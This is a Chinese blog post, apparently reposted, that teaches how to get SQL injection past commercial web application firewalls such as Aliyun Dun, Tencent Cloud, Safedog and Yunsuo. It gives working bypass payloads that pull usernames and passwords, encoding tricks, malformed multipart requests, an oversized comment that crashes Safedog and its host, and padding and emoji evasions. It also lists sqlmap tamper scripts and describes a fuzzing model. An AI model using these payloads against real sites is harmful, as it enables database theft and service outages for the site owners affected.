[出自:jiwo.org]

去年到现在就一直有人希望我出一篇关于waf绕过的文章，我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵，不知如何是好，能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的，那么就有了此文，用来总结一些学习和培养突破waf的思想。可能总结的并不全，但目的并不是讲那些网上搜来一大把的东西，So…并不会告诉大家现有的姿势，而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass（这里只讲主流waf的黑盒测试）

0x01 搞起

当我们遇到一个waf时，要确定是什么类型的？先来看看主流的这些waf，狗、盾、神、锁、宝、卫士等等。。。（在测试时不要只在官网测试，因为存在版本差异导致规则库并不一致）



1、云waf：

在配置云waf时（通常是CDN包含的waf），DNS需要解析到CDN的ip上去，在请求uri时，数据包就会先经过云waf进行检测，如果通过再将数据包流给主机。

2、主机防护软件：

在主机上预先安装了这种防护软件，可用于扫描和保护主机（废话），和监听web端口的流量是否有恶意的，所以这种从功能上讲较为全面。这里再插一嘴，mod_security、ngx-lua-waf这类开源waf虽然看起来不错，但是有个弱点就是升级的成本会高一些。

3、硬件ips/ids防护、硬件waf（这里先不讲）

使用专门硬件防护设备的方式，当向主机请求时，会先将流量经过此设备进行流量清洗和拦截，如果通过再将数据包流给主机。


再来说明下某些潜规则（关系）：

百度云加速免费版节点基于CloudFlare
安全宝和百度云加速规则库相似
创宇云安全和腾讯云安全规则库相似
腾讯云安全和门神规则库相似
硬件waf自身漏洞往往一大堆

当Rule相似时，会导致一个问题，就比如和双胞胎结婚晓得吧？嗯。

0x02 司空见惯


我们还需要把各种特性都记牢，在运用时加以变化会很有效果。


数据库特性：

• 注释：

复制代码

1. #
2. --
3. -- -
4. --+
5. //
6. /**/
7. /*letmetest*/
8. ;

利用注释简单绕过云锁的一个案例： 





拦截的，但/**/ > 1个就可以绕过了，也就是/**//**/以上都可以。

• 科学记数法：

• 空白字符：

复制代码

1. SQLite3 0A 0D 0C 09 20
2. MySQL5 09 0A 0B 0C 0D A0 20
3. PosgresSQL 0A 0D 0C 09 20
4. Oracle 11g 00 0A 0D 0C 09 20
5. MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

• +号：

• -号：

• ``符号：

• ~号：

• !号：

• @`形式`：

• 点号.1：

• 单引号双引号：

• 括号select(1)：

试试union(select)云盾会不会拦截

• 花括号：

这里举一个云盾的案例，并附上当时fuzz的过程：

复制代码

1. union+select 拦截
2. select+from 不拦截
3. select+from+表名 拦截
4. union(select) 不拦截
5. 所以可以不用在乎这个union了。
6. union(select user from ddd) 拦截
7. union(select%0aall) 不拦截
8. union(select%0aall user from ddd) 拦截
9. fuzz下select%0aall与字段之间 + 字段与from之间 + from与表名之间 + 表名与末尾圆括号之间可插入的符号。
10. union(select%0aall{user}from{ddd}) 不拦截。

Bypass Payload：

复制代码

1. 1 union(select%0aall{x users}from{x ddd})
2. 1 union(select%0adistinct{x users}from{x ddd})
3. 1 union(select%0adistinctrow{x users}from{x ddd})

可运用的sql函数&关键字：

复制代码

1. MySQL：
2. union distinct
3. union distinctrow
4. procedure analyse()
5. updatexml()
6. extracavalue()
7. exp()
8. ceil()
9. atan()
10. sqrt()
11. floor()
12. ceiling()
13. tan()
14. rand()
15. sign()
16. greatest()
17. 字符串截取函数
18. Mid(version(),1,1)
19. Substr(version(),1,1)
20. Substring(version(),1,1)
21. Lpad(version(),1,1)
22. Rpad(version(),1,1)
23. Left(version(),1)
24. reverse(right(reverse(version()),1)
25. 字符串连接函数
26. concat(version(),'|',user());
27. concat_ws('|',1,2,3)
28. 字符转换
29. Char(49)
30. Hex('a')
31. Unhex(61)
32. 过滤了逗号
33. (1)limit处的逗号：
34. limit 1 offset 0
35. (2)字符串截取处的逗号
36. mid处的逗号：
37. mid(version() from 1 for 1)
39. MSSQL：
40. IS_SRVROLEMEMBER()
41. IS_MEMBER()
42. HAS_DBACCESS()
43. convert()
44. col_name()
45. object_id()
46. is_srvrolemember()
47. is_member()
48. 字符串截取函数
49. Substring(@@version,1,1)
50. Left(@@version,1)
51. Right(@@version,1)
52. (2)字符串转换函数
53. Ascii('a') 这里的函数可以在括号之间添加空格的，一些waf过滤不严会导致bypass
54. Char('97')
55. exec

Mysql BIGINT数据类型构造溢出型报错注入：BIGINT Overflow Error Based SQL Injection http://www.thinkings.org/2015/08/10/bigint-overflow-error-sqli.html


容器特性：

• %特性：

asp+iis的环境中，当我们请求的url中存在单一的百分号%时，iis+asp会将其忽略掉，而没特殊要求的waf当然是不会的： 






修复方式应该就是检测这种百分号%的周围是否能拼凑成恶意的关键字吧。

• %u特性：

iis支持unicode的解析，当我们请求的url存在unicode字符串的话iis会自动将其转换，但waf就不一定了： 







修复过后： 






这个特性还存在另一个case，就是多个widechar会有可能转换为同一个字符。

复制代码

1. s%u0065lect->select
2. s%u00f0lect->select

WAF对%u0065会识别出这是e，组合成了select关键字，但有可能识别不出%u00f0



其实不止这个，还有很多类似的：

复制代码

1. 字母a：
2. %u0000
3. %u0041
4. %u0061
5. %u00aa
6. %u00e2
7. 单引号：
8. %u0027
9. %u02b9
10. %u02bc
11. %u02c8
12. %u2032
13. %uff07
14. %c0%27
15. %c0%a7
16. %e0%80%a7
17. 空白：
18. %u0020
19. %uff00
20. %c0%20
21. %c0%a0
22. %e0%80%a0
23. 左括号(：
24. %u0028
25. %uff08
26. %c0%28
27. %c0%a8
28. %e0%80%a8
29. 右括号)：
30. %u0029
31. %uff09
32. %c0%29
33. %c0%a9
34. %e0%80%a9

• 畸形协议&请求：

asp/asp.net：
还有asp/asp.net在解析请求的时候，允许application/x-www-form-urlencoded的数据提交方式，不管是GET还是POST，都可正常接收，过滤GET请求时如果没有对application/x-www-form-urlencoded提交数据方式进行过滤，就会导致任意注入。



php+Apache：



waf通常会对请求进行严格的协议判断，比如GET、POST等，但是apache解析协议时却没有那么严格，当我们将协议随便定义时也是可以的：




PHP解析器在解析multipart请求的时候，它以逗号作为边界，只取boundary，而普通解析器接受整个字符串。 因此，如果没有按正确规范的话，就会出现这么一个状况：首先填充无害的data，waf将其视为了一个整体请求，其实还包含着恶意语句。

复制代码

1. ------,xxxx
2. Content-Disposition: form-data; name="img"; filename="img.gif"
5. GIF89a
6. ------
7. Content-Disposition: form-data; name="id"
10. 1' union select null,null,flag,null from flag limit 1 offset 1-- -
11. --------
12. ------,xxxx--

通用的特性：

• HPP：

HPP是指HTTP参数污染-HTTP Parameter Pollution。当查询字符串多次出现同一个key时，根据容器不同会得到不同的结果。
假设提交的参数即为：


id=1&id=2&id=3

复制代码

1. Asp.net + iis：id=1,2,3
2. Asp + iis：id=1,2,3
3. Php + apache：id=3

• 双重编码：

这个要视场景而定，如果确定一个带有waf的site存在解码后注入的漏洞的话，会有效避过waf。

复制代码

1. unlencode
2. base64
3. json
4. binary
5. querystring
6. htmlencode
7. unicode
8. php serialize

• 我们在整体测试一个waf时，可测试的点都有哪些？

GET、POST、HEADER那么我们专门针对一个waf进行测试的时候就要将这几个点全测试个遍，header中还包括Cookie、X-Forwarded-For等，往往除了GET以外其他都是过滤最弱的。

0x03 见招拆招
“正则逃逸大法”：或许大家没听说过这个名词，因为是我起的。我发现很多waf在进行过滤新姿势的时候很是一根筋，最简单的比方，过滤了%23%0a却不过滤%2d%2d%0a？上面提到八成的waf都被%23%0a所绕过。









科学计数法1union、1from？多次被坑的安全宝&百度云加速&Imperva：









过滤了union+select+from，那我select+from+union呢？使用Mysql自定义变量的特性就可以实现，这里举一个阿里云盾的案例：






由于后面在调用自定义变量的时候需要用到union+select，所以还需要绕过这个点。/*ddd*/union/*ddd*/select 就可以了。
Bypass Payload：

复制代码

1. id=1|@pwd:=(select username from users where id=4)/*ddd*/union/*ddd*/select null,@pwd

如何做到通过推理绕过waf？这里举一个腾讯云安全的案例：


绕过思路: 首先看看腾讯云安全怎么检测sql注入的，怎么匹配关键字会被拦截，怎么匹配不会?

• union+select拦截
• select+from拦截
• union+from不拦截

那么关键的点就是绕过这个select关键字

• select all
• select distinct
• select distinctrow

既然这些都可以，再想想使用这样的语句怎么不被检测到？select与all中间肯定不能用普通的/**/这种代替空格，还是会被视为是union+select。select all可以这么表达/*!12345select all*/，腾讯云早已识破这种烂大街的招式。尝试了下/*!*/中间也可以使用%0a换行。





/*!12345%0aselect%20all*/还是会被拦截，这就说明腾讯云在语法检测的时候会忽略掉数字后面的%0a换行，虽然属于union+12342select，但简单的数字和关键字区分识别还是做得到。再测试/*!12345select%0aall*/，结果就合乎推理了，根据测试知道腾讯云安全会忽略掉%0a换行，这就等于union+12345selectall， 不会被检测到。（忽略掉%0a换行为了过滤反而可以用来加以利用进行Bypass）





可能会问，推理的依据并不能真正意义上证明忽略掉了%0a啊？当然要证明下啊，/*!12345%0aselect%0aall*/就被拦截了，说明刚开始检测到12345%0aselect就不再检测后方的了，union+12345select就已经可以拦截掉了。


还可能会问，既然忽略掉了%0a，那么/*!select%0aall*/是不是也可以啊，然而并不行。合理的推理很有必要。
Bypass Payload:

复制代码

1. 1' union/*!50000select%0aall*/username from users%23
2. 1' union/*!50000select%0adistinct*/username from users%23
3. 1' union/*!50000select%0adistinctrow*/username from users%23

不是绕不过狗，只是不够细心：

复制代码

1. union+select拦截。
2. select+from拦截。
3. union+from不拦截。
4. fuzz了下/*!50000select*/这个5位数，前两位数<50 && 第二位!==0 && 后三位数==0即可bypass。(一点细节也不要放过。)

测试环境

复制代码

1. Windows Server 2008 + APACHE + PHP + Mysql Bypass Payload:
2. 1' union/*!23000select*/user,password from users%23

这里证明一个观点：好姿势不是死的，零零碎碎玩不转的姿势巧妙的结合一下。所以说一个姿势被拦截不代表就少了一个姿势。

0x04 别按套路出牌
云锁版本迭代导致的 & 360主机卫士一直存在的问题：


注意POST那个方向，waf在检测POST传输的数据过程中，没有进行URL的检测，也就是说waf会认为URL上的任何参数信息都是正常的。既然是POST请求，那就只检测请求正文咯。(神逻辑)

在标准HTTP处理流程中，只要后端有接收GET形式的查询字段，即使客户端用POST传输，查询字符串上满足查询条件时，是会进行处理的。（没毛病）





点睛之图:)


当waf成了宕机的罪魁祸首是什么样的？举一个安全狗的案例：

复制代码

1. /*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/

注释中包含超长查询字符串，导致安全狗在识别的过程中挂掉了，连带着整个机器Service Unavailable：


再举一个云锁也是因为数据包过长导致绕过的案例：

云锁在开始检测时先判断包的大小是否为7250byte以下，n为填充包内容，设置n大小为2328时，可以正常访问页面，但是会提示拦截了SQL注入



当数据包超过2329时就可以成功绕过，2329长度以后的就不检测了。？

0x05 猥琐很重要
这里讲个有意思的案例，并且是当时影响了安全宝、阿里云盾的姿势：
有次睡前想到的，emoji图标！是的，平时做梦并没有美女与野兽。当时只是随便一想，第二天问了5up3rc，他说他也想过，但测试并没有什么效果。



emoji是一串unicode字集组成，一个emoji图标占5个字节，mysq也支持emoji的存储，在mysql下占四个字节:







既然在查询的时候%23会忽略掉后面的，那么Emoji就可以插入到%23与%0A之间。再加多试了试，成功绕过了，200多个emoji图标，只能多，但少一个都不行。。。



可能会说，这是因为超⻓查询导致的绕过吧?并不是。



这么⻓，mysql也是会执行的:





我们再来测试阿里云盾：



绕过了。。。事情还没看起来这么简单。



当缩少emoji数量的话会拦截，想想还是再加多些试试:



还是拦截，那刚才的没拦截是怎么回事?点根烟，逐一进行排查。发现能绕过的原因和emoji数量无关，而是某个emoji可以。



就是这个愤怒的emoji，其他的emoji都不行。唯独愤怒脸可以:



将这些emoji进行urlencode看看特征，究竟是什么原因?看看哪些emoji插入不会被拦截:



有些emoji进行urlencode后是很⻓的，因为是几个emoji进行组合的。



将这些payload进行注入进去。



难道只有这个愤怒脸插入进去就可以绕过?也不能这么说，我发现能绕过的字符都是ascii码超过了127的字符：



那为什么愤怒脸的emoji可以?这里提到emoji的特征，常⻅的emoji是四位组成，前三位多数是一致的，把这三位插入payload试试:



可以实现绕过，再来看看愤怒脸的urlencode:



最后一位是%a0，那么也就是说完全可以忽略掉最后一位，而多数emoji第四位是 < ascii 127的，所以达到绕过的只是 > ascii 127的字符，会导致waf引擎无法检测。





我是个技术人，虽然这是异想天开没有任何根据的想法，但仍愿意去尝试。courage to try!

0x06 自动化Bypass

首先总结下sqlmap的各种bypass waf tamper：

复制代码

1. apostrophemask.py 用UTF-8全角字符替换单引号字符
2. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
3. appendnullbyte.py 在payload末尾添加空字符编码
4. base64encode.py 对给定的payload全部字符使用Base64编码
5. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”
6. bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”
7. chardoubleencode.py 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）
8. charencode.py 对给定的payload全部字符使用URL编码（不处理已经编码的字符）
9. charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）
10. concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
11. equaltolike.py 用“LIKE”运算符替换全部等于号“=”
12. greatest.py 用“GREATEST”函数替换大于号“>”
13. halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
14. ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
15. lowercase.py 用小写值替换每个关键字字符
16. modsecurityversioned.py 用注释包围完整的查询
17. modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
18. multiplespaces.py 在SQL关键字周围添加多个空格
19. nonrecursivereplacement.py 用representations替换预定义SQL关键字，适用于过滤器
20. overlongutf8.py 转换给定的payload当中的所有字符
21. percentage.py 在每个字符之前添加一个百分号
22. randomcase.py 随机转换每个关键字字符的大小写
23. randomcomments.py 向SQL关键字中插入随机注释
24. securesphere.py 添加经过特殊构造的字符串
25. sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
26. space2comment.py 用“/**/”替换空格符
27. space2dash.py 用破折号注释符“–”其次是一个随机字符串和一个换行符替换空格符
28. space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
29. space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
30. space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
31. space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
32. space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
33. space2mysqldash.py 用破折号注释符“–”其次是一个换行符替换空格符
34. space2plus.py 用加号“+”替换空格符
35. space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
36. unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
37. unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
38. varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
39. versionedkeywords.py 用MySQL注释包围每个非函数关键字
40. versionedmorekeywords.py 用MySQL注释包围每个关键字
41. xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

看起来很全，但有个缺点就是功能单一，灵活程度面对当今的主流waf来说很吃力了。

鉴于多数waf产品是使用Rule进行防护，那么这里也不提什么高大上的机器学习。就是简单粗暴的fuzz。

提到系统的训练，鉴于多数waf产品是使用Rule进行防护，那么这里不说什么机器学习。来点简单粗暴有效果的修复方案：我把每个sql关键字比喻成“位”，将一个“位”的两边进行模糊插入各种符号，比如注释（# — /**/）、逻辑运算符、算术运算符等等。


15年黄登在阿里云安全峰会提到的fuzz手法通过建立一个有毒标识模型，将将其插入到各种“位”，测试其waf。

在这基础上其实可以在更加全面的建立模型。因为我发现一个问题，常规绕过姿势都会被拦截。但是呢，稍加fuzz下其他“位”，做一些变通就又能绕过。最基本的一句注入语句就有这些位：

最常见的四种sql注入语句：select、update、insert、delete

复制代码

1. 有毒标识定义为n
2. “位”左右插入有毒表示那么就是x的n次幂
3. 而且其他数据库也各有各的语法糖，次数量定义为y
4. 如果再将其编码转换定位为m
5. 其结果最少就得有：

复制代码

1. Factor[((x^n)*4 + x*y)*m]

通常waf引擎先转换m后再去匹配，这个还是要看场景。还有关键字不止这些，稍微复杂一点的环境就会需要更多的关键字来注入，也就会需要fuzz更多的位。还没说特殊字符，根据系统含有特殊意义的字符等等，也要有所顾忌。
当前几个关键字达到绕过效果时，只需继续fuzz后面几个位即可。
还有就是传输过程中可测试的点：

因为当我们在传输的过程中导致的绕过往往是致命的，比如中间件的特性/缺陷，导致waf不能识别或者是在满足特定条件下的欺骗了waf。

0x07 End

一写起来就根本停不起来，后期决定出一系列waf绕过文，例如文件上传、webshell防御、权限提升等Waf绕过。xss的bypass就算了，防不胜防…（如果又想到什么有趣的手法的话，我会以下面回帖的方式给大家）